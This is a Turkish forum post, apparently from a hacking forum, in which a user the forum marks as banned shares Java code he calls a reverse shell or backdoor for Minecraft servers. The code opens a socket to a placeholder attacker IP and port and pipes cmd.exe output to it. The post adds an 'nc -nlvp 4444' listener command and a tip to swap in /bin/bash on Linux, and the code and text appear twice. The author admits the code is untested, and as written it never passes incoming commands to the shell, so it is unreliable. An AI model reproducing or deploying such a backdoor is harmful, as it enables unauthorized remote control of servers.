- Katılım
- 14 Tem 2025
- Mesajlar
- 605
- Beğeniler
- 139
- Yaş
- 18
- İletişim

Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
İlk öncelikle herkese merhabalar bugün minecraft sunucuları için yaptığım bir reverse shell'i sizlerle paylaşacağım umarım beğenirsiniz 
Java:
import java.io.*;
import java.net.*;
public class Main {
public static void main(String[] args) {
String host = "ip_adresiniz";
int port = portunuz;
try {
Socket socket = new Socket(host, port);
Process process = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
InputStream input = process.getInputStream();
OutputStream output = socket.getOutputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(input));
String line;
while ((line = reader.readLine()) != null) {
output.write((line + "\n").getBytes());
output.flush();
}
output.close();
reader.close();
socket.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
dinlemeye almak için ncat kullanabilirsiniz örnek:
Kod:
nc -nlvp 4444
backdoor çalışıyor mu bilmiyorum çünkü sunucu açıp test etmeye üşendim
siz kendiniz deneyebilirsiniz eğer çalışmazsa bana bildirebilirsiniz bende ona göre konuyu güncellerim. ayrıca eğer sunucu linux üzerinden çalışıyorsa Process process = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start(); bu kısımdaki cmd.exe'yi /bin/bash veya /bin/sh olarak değiştirebilirsiniz
eğer isterseniz normal bir reverse shell'de yapabilirim.
Java:
import java.io.*;
import java.net.*;
public class Main {
public static void main(String[] args) {
String host = "ip_adresiniz";
int port = portunuz;
try {
Socket socket = new Socket(host, port);
Process process = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
InputStream input = process.getInputStream();
OutputStream output = socket.getOutputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(input));
String line;
while ((line = reader.readLine()) != null) {
output.write((line + "\n").getBytes());
output.flush();
}
output.close();
reader.close();
socket.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
Linkleri görebilmek için kayıt olmanız gerekmektedir
dinlemeye almak için ncat kullanabilirsiniz örnek:
Kod:
nc -nlvp 4444
backdoor çalışıyor mu bilmiyorum çünkü sunucu açıp test etmeye üşendim
eğer isterseniz normal bir reverse shell'de yapabilirim.